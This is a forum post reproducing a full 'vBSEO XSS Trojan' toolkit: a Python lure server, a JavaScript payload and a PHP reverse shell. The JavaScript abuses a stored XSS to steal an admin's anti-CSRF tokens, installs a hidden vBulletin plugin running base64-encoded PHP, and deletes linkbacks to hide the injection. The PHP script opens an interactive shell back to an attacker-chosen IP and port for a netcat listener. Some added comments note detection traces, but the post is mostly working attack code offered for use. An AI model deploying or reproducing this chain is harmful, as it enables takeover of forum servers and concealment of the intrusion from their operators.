Trojan XSS - Evilwebtool (From XSS to Reverse Shell [PHP])
Publicado: 14 Feb 2011, 06:40
#!/usr/bin/env python
#
# License: Attribution-ShareAlike 3.0 Unported
# http://creativecommons.org/licenses/by-sa/3.0/
import sys
import re
import random
import httplib
import base64
import socket
from socket import gethostname
from os import curdir, sep
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def title():
"""Return the ASCII-art banner that main() prints on its usage and configuration-error paths; no side effects."""
banner = """
/*****************************************\\
| vBSEO XSS Trojan |____/\______o____//\\\_|
| Version: 1.3.2 | / \/\ #"=- //\\\ |
| Author: MaXe | / \ \ /\ || |
|-----------------------------------------|
| Educational Purposes Only | XSS is not |
|---------------------------| a big deal. |
| http://www.intern0t.net | Or is it..? |
\\*****************************************/
"""
return banner
# /**************************\
# | SERVER CONFIGURATION |
# \**************************/
# socket.getaddrinfo(socket.gethostname(), None)[0][4][0]
# socket.gethostbyname(socket.gethostname())
# The above methods seemed to be buggy on Linux, but worked fine on Windows (XP)
# NOTE(review): everything in this section is evaluated once at import time, so
# `xss_title` below bakes in whatever `host` and `port` hold at that moment.
host = '' # You need to set this manually.
port = 1234 # You may need to edit this too. This exploit was tested with port 80.
# /*************************\
# | PAYLOAD CONFIGURATION |
# \*************************/
# Do not edit these unless you know what you're doing. (Avoid common pattern detection)
# Per-run random names for the two resources MyHandler.do_GET serves (a ".php"
# lure page and the ".js" payload). Randomising the names defeats filename-based
# signatures; the strings that do NOT vary between runs — the `hax0r1tn0w`
# trigger parameter, the `XSS_Infected` cookie and the `injected_haxx` plugin
# title in the JavaScript trojan on this page — are the more durable detection
# anchors.
evil_php = "%s%s%s" % (random.randrange(0, 253),random.randrange(1, 256),random.randrange(0, 255))
evil_jsf = "%s%s%s" % (random.randrange(1, 257),random.randrange(0, 254),random.randrange(1, 258))
payload_file = "trojan.js" # Javascript file containing our payload - This file needs to exist locally
# The value served as the lure page's <title>: it closes the attribute it lands
# in (`" size="70" ...`), opens a <script> tag pointing back at this server's
# payload file, and the trailing `<br ` swallows the remainder of the original
# tag — an attribute-breakout stored-XSS string.
xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1"><script src="http://%s:%s/%s.js"></script><br ' % (host,port,evil_jsf)
# `toHex` is not referenced anywhere else in this script; it is a leftover from
# the hex-encoding variant that the "changed from Hex to Base64" comments refer to.
toHex = lambda x:'\\x'.join([hex(ord(c))[2:].zfill(2) for c in x]) # Encodes input into \xHH format
# /*************************\
# | PAYLOAD PREPARATION |
# \*************************/
def prepPayload():
"""Build the JavaScript payload for MyHandler and store it in the global `payload_new`.

Reads `payload_file` and replaces its `PHP_PAYLOAD` marker with a PHP snippet
wrapped as `eval(base64_decode("..."))`; the snippet is guarded by
`$_GET['hax0r1tn0w']=='true'`, the trigger main() announces. Interactive:
'code' takes arbitrary PHP typed at the prompt, 'shell' loads the
php-reverse-shell from `extras/`, fills in its LOCALHOST/LOCALPORT
placeholders and strips comments, tabs and newlines so it fits in one
hidden-input value. Any other answer, or CTRL+C, exits the process.

Detection notes: `eval(base64_decode(` and `hax0r1tn0w` are fixed strings —
the former ends up in the stored plugin code, the latter in web-server access
logs — whereas the served file names are random per run.
Neither file handle opened here is closed (no `with`, no `close()`).
"""
try:
payload_buff = open(payload_file)
# Module-level result consumed by MyHandler.do_GET.
global payload_new
print "\n[?] Do you wish enter code or get a reverse shell?"
theoption = raw_input("[+] Type 'code' or 'shell' please: ")
if theoption == 'code':
payload_input = "if($_GET['hax0r1tn0w']=='true') { "
payload_input += raw_input("[+] Enter code without PHP tags: ")
payload_input += " }"
payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input)+"\"));" # Was changed from Hex to Base64
payload_replace = re.compile('(PHP_PAYLOAD)')
payload_new = payload_replace.sub(payload_insert, payload_buff.read())
elif theoption == 'shell':
payload_shell = open('extras/php-reverse-shell-1.0/php-reverse-shell.php')
localhost = raw_input("[+] Enter an IP-address: ")
localport = raw_input("[+] Enter a local port: ")
# Plain-text substitution of the two placeholders in the PHP source (see the
# PHP listing on this page); the typed values are inserted verbatim, unquoted.
find_host = re.compile('(LOCALHOST)')
add_host = find_host.sub(localhost,payload_shell.read())
find_port = re.compile('(LOCALPORT)')
add_port = find_port.sub(localport,add_host)
# Minify: drop `//` line comments and single-line `/* */` blocks, then tabs/newlines.
stripcomments = re.compile('//.*?\n|/\*.*?\*/')
filepart1 = stripcomments.sub('', add_port)
stripspace = re.compile('[\t\n]')
filepart2 = stripspace.sub('', filepart1)
payload_input_shell = "if($_GET['hax0r1tn0w']=='true') { %s } " % filepart2
payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" # Was changed from Hex to Base64
payload_replace = re.compile('(PHP_PAYLOAD)')
payload_new = payload_replace.sub(payload_insert, payload_buff.read())
print "[*] Start netcat before you proceed: nc -lv %s %s" % (localhost,localport)
print "[?] This must be done in another window than where the server is listening."
else:
print "[!] You did not type 'code' or 'shell', exiting script.."
sys.exit(0)
except KeyboardInterrupt:
print '\n[*] CTRL+C received, exiting script..'
sys.exit(0)
# /**************************\
# | TARGET CONFIGURATION |
# \**************************/
# Target thread URL (argv[1]). Its only use is as the href of the lure link
# written by MyHandler.do_GET. The empty fallback is never served, because
# main() refuses to start the server unless exactly one argument is present.
if sys.argv[1:]:
target_link = sys.argv[1]
else:
target_link = ''
class MyHandler(BaseHTTPRequestHandler):
"""Request handler for the attacker-side HTTP server that main() creates.

Three routes, matched by path suffix only (no normalisation):
  * `<evil_php>.php` - the lure page whose <title> is `xss_title` and whose
    single link points at `target_link`;
  * `<evil_jsf>.js`  - the JavaScript payload prepared by prepPayload();
  * anything else    - `index.html` from the working directory.

NOTE(review): the XSS string is delivered only through the lure page's
<title>, while the page links back to the target thread, and the JavaScript
trojan on this page later deletes "LinkBacks" — consistent with the stored
vector being vBSEO's linkback title, but confirm against the original
advisory rather than this code.
"""
def do_GET(self):
"""Serve one GET; a missing local file becomes a 404 whose body echoes the request path."""
try:
if self.path.endswith("%s.php" % evil_php): # This will be our dynamic extension for injection
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title>' % xss_title)
self.wfile.write('</head><body><center><h1>vBSEO XSS Trojan</h1><br /><br />')
self.wfile.write('<a href="%s" target="_blank">Click This to Begin Injection</a>' % target_link)
self.wfile.write('</center></body></html>')
return
if self.path.endswith("%s.js" % evil_jsf): # These files must be in plain text.
# `f` is opened only so that a missing payload file raises IOError (-> 404);
# the body actually written is the in-memory `payload_new` built by prepPayload().
f = open('%s' % payload_file)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(payload_new)
f.close()
return
if self.path.endswith(""): # This will show our main index file
# str.endswith("") is always True, so this branch catches every remaining
# path and the bare `return` after it is unreachable.
f = open('index.html')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(f.read())
f.close()
return
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
def assess():
"""Optionally fingerprint the target before anything is served.

Asks for a base URL, strips the scheme, and issues a plain-HTTP GET on port
80 for `/sup3rs3cr3t/vbseocp.php`. A 200 whose body carries one of two vBSEO
`<title>` strings (3.5.2 or 3.3.2) is reported as "appears to be vulnerable";
any other 200 as "may still be vulnerable". Purely advisory: every branch
falls through and the caller proceeds regardless of the outcome.

Defender notes: a GET for `/sup3rs3cr3t/vbseocp.php` from an unexpected
client is the access-log signature of this check. The connection is never
closed. Only `http://` / `https://` are removed from the input, so anything
else typed (a path, a port) is passed straight to HTTPConnection as the host.
"""
try:
yesorno = raw_input("[?] Do you want to check if the target is vulnerable?\n[+] Type 'yes' or 'no' please: ")
if yesorno == "yes":
print "\n[?] Specify the target like this: http://forum-site.tld"
ctarget = raw_input("[+] Please input target: ")
# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', ctarget)
# Make the connection to the vulnerable file
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/sup3rs3cr3t/vbseocp.php")
resp = conn.getresponse()
output = resp.read()
# If the file was found and we have access to it (200 OK)
if resp.status == 200:
print "[*] Website is responding, this is good."
# Version fingerprint by literal <title> match; anything else is inconclusive.
if re.search("(<title>vBSEO Control Panel, vBSEO v.3.5.2</title>)", output):
print ">> The site appears to be vulnerable! (Version 3.5.2)"
elif re.search("(<title>vBSEO v.3.3.2</title>)", output):
print ">> The site appears to be vulnerable! (Version: 3.3.2)"
else:
print "[!] The site does not run vBSEO 3.3.2 nor 3.5.2, but may still be vulnerable."
else:
print '[-] Server did not respond with a 200 OK message, continuing script execution.'
elif yesorno == "no":
print "[*] Starting server, continuing script execution."
else:
print "[*] You didn't type yes or no, continuing script execution."
except KeyboardInterrupt:
print '\n[*] CTRL+C received, continuing script execution.'
def main():
"""Entry point: check argv and `host`, optionally fingerprint, build the payload, create the server.

As written the HTTPServer object is created but `serve_forever()` is commented
out (see the author's note on that line), so the process prints its status
lines and exits without handling a request.
The `except KeyboardInterrupt` handler references `server`, which can be
unbound if CTRL+C arrives before `HTTPServer(...)` has returned; that path
raises NameError rather than closing the socket.
"""
try:
if len(sys.argv) != 2:
print title()
print '[!] You need to specify a target before this script will run.'
print '[?] Check out the source for further customizations.\n'
print 'Usage: %s target' % __file__
print 'Example: %s http://forum-site.tld/1234-a-nice-thread.html' % __file__
else:
# `host` is the module-level setting; it is '' unless the source was edited.
if host == '':
print title()
print '[!] You need to edit the host variable in the source.'
else:
assess()
prepPayload()
server = HTTPServer((host, port), MyHandler)
print '\n\t/**************************\\'
print '\t| Started Evil HTTP Server |'
print '\t\\**************************/\n'
print '[*] Serving attack file from: http://%s:%s/%s.php ' % (host,port,evil_php)
print '[*] Serving payload file from: http://%s:%s/%s.js \n' % (host,port,evil_jsf)
# `misc.php?hax0r1tn0w=true` is the fixed trigger URL the stored PHP checks for;
# it is the request a defender would find in the victim forum's access logs.
print '[!] Browse to: "misc.php?hax0r1tn0w=true", to activate the payload.'
print '[?] Press CTRL+C to stop the server and exit the script. \n'
print '-------------- HTTP Requests Below --------------'
#server.serve_forever() # You need to uncomment this line for the script to work.
except KeyboardInterrupt:
print '[*] CTRL+C received, shutting down Evil HTTP Server.'
server.socket.close()
# Script entry guard; main() does all argument handling.
if __name__ == '__main__':
main()
Troyano en javascript
/********************************\
|* vBulletin XSS Trojan *|
|* Developed by: MaXe *|
|* Version: 2.8.5 Final *|
|* Site: www.intern0t.net *|
|********************************|
|* Educational Purposes Only! *|
\********************************/
/* Special thanks to: eXeDK *\
|********************************|
|* CSRF Bypass Reference: *|________________________________________
|* http://rstcenter.com/forum/17987-using-xss-bypass-csrf-protection.rst *|
\*************************************************************************/
function silent_inject() {
// Runs as the onload handler of the iframe created at the bottom of this file,
// after that frame has loaded the admin "add plugin" form. Being same-origin,
// this script can read the two anti-CSRF values vBulletin expects on submit and
// replay them — the "CSRF bypass" named in the banner.
// Nothing in the submitted form is randomised: the plugin it creates is titled
// `injected_haxx`, hooks `misc_start`, has executionorder 5 and active=1, and
// its `phpcode` is whatever replaced the PHP_PAYLOAD marker. Those field values
// are the durable forensic artifact in the vBulletin plugin table once the
// linkback clean-up below has removed the stored XSS itself.
// Read and save the adminhash + securitytoken - Bypass the CSRF protection
var adminhash = top.document.getElementById('silent_frame').contentDocument.cpform.adminhash.value;
var securitytoken = top.document.getElementById('silent_frame').contentDocument.cpform.securitytoken.value;
// A hidden vBulletin plugin payload
var form_input = '\
<input type="hidden" name="do" value="update" />\
<input type="hidden" name="adminhash" value="'+adminhash+'" />\
<input type="hidden" name="securitytoken" value="'+securitytoken+'" />\
<input type="hidden" name="product" value="vbulletin" />\
<input type="hidden" name="hookname" value="misc_start" />\
<input type="hidden" name="title" value="injected_haxx" />\
<input type="hidden" name="executionorder" value="5" />\
<input type="hidden" name="phpcode" value=\'PHP_PAYLOAD\' />\
<input type="hidden" name="active" value="1" />\
<input type="hidden" name="pluginid" value="" />\
';
// A function which silently injects our hidden payload form
// Builds a <form> whose body is `content`, appends it to the iframe's document,
// then gives it id/name "intern0t" and the supplied action/method.
function silent_form_inject(action,method,content) {
var silent_main_tag = document.createElement('form');
// The inner contents of our form is equal to the content variable
silent_main_tag.innerHTML = ' '+content;
top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag);
silent_main_tag.setAttribute('id','intern0t');
silent_main_tag.setAttribute('name','intern0t');
silent_main_tag.setAttribute('action',action);
silent_main_tag.setAttribute('method',method);
}
// Initiate the second silent injection into our iframe
silent_form_inject('plugin.php?do=update','POST',form_input);
// Send our payload automatically - There's no turning back now
// Submitted at most once per browser: the `XSS_Infected` cookie set right
// after is the client-side marker that this ran (see SetCookie for its scope).
if (document.cookie.indexOf("XSS_Infected") == -1) {
top.document.getElementById('silent_frame').contentDocument.getElementById('intern0t').submit();
SetCookie("XSS_Infected","true"); // Prevent re-infection / loops
}
// Give the malicious linkback 2 secs to inject a small payload, before self-removal
// String-evaluated timer; the returned handle `end` is never used.
var end = setTimeout("clean_up()",2000);
}
// Delete all LinkBacks on the current page - Including ours
function clean_up() {
// Cover-up step: `js_check_all_option` is not defined in this listing —
// presumably the forum page's own helper that ticks every checkbox in the
// `linkbacks` form (verify against the page). Submitting that form deletes the
// linkbacks, including the one carrying the payload, so after this runs the
// evidence lives in the plugin table rather than in the linkback list.
js_check_all_option(document.linkbacks, -1);
document.linkbacks.submit();
}
// A function to create a cookie so the infection happens only once
function SetCookie(cookieName,cookieContent) {
// Writes `cookieName=cookieContent` for path "/" expiring 372,800,000 ms
// (about 4.3 days) from now, using the legacy escape() for encoding.
// For the victim this is the only client-side trace: a cookie named
// XSS_Infected on the forum's origin.
var cookiePath = '/';
var expDate=new Date();
expDate.setTime(expDate.getTime()+372800000);
var expires=expDate.toGMTString();
document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
// If our cookie is not present, continue
// Script entry: runs once per browser, gated by the same cookie silent_inject sets.
// If our cookie is not present, continue
if (document.cookie.indexOf("XSS_Infected") == -1) {
// Append a (hidden) iframe for stealthy data injection
// Only id, onload and src are set — no size or style — so the frame actually
// renders visibly despite the comment above.
var mainframe = document.createElement("iframe");
mainframe.setAttribute('id', 'silent_frame');
top.document.body.appendChild(mainframe);
mainframe.setAttribute('onload', 'main.silent_inject()');
// Relative URL: resolved against the page the XSS fired on.
mainframe.setAttribute('src', 'plugin.php?do=add');
}
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at [email protected]
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
// Configuration. LOCALHOST / LOCALPORT are literal placeholders: the Python
// launcher on this page substitutes them in the file text before embedding
// the script, so no listener address appears in this source as shipped.
set_time_limit (0);
$VERSION = "1.0";
$ip = 'LOCALHOST'; // CHANGE THIS
$port = LOCALPORT; // CHANGE THIS
// Bytes moved per fread() between the socket and the shell's pipes.
$chunk_size = 1400;
// stream_select() takes the write/except sets by reference; both are unused.
$write_a = null;
$error_a = null;
// Command line handed to proc_open(): three fingerprinting commands, then an
// interactive /bin/sh. Host-side, a web-server worker with a child `sh -i`
// attached over pipes is the artifact of this tool.
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// NOTE: This was moved to the beginning since it should be declared before being used.
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
// NOTE(review): `$daemon` is not imported with `global`, so inside this
// function it is an undefined local (falsy) and the guard always passes —
// output is printed even after the script has daemonised.
if (!$daemon) {
print "$string\n";
}
}
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
// Recorded for printit(), which cannot see it (no `global` there).
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
// The shell spawned below inherits this, so files it creates default to
// world-writable — an easily audited trace on the host.
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
// Open reverse connection
// Outbound TCP from the web-server process to $ip:$port with a 30 s timeout;
// on the network this connection, not any inbound request, is the indicator.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
// Relay loop: socket -> shell stdin, shell stdout/stderr -> socket, until either
// side closes. The first bytes sent back are the output of `uname -a; w; id`.
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
// $read_a is rebuilt each pass because stream_select() rewrites it in place;
// the null timeout blocks indefinitely. The return value is never examined.
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
// Teardown once either end has gone away.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
Fuente: [Enlace externo eliminado para invitados] ... php-shell/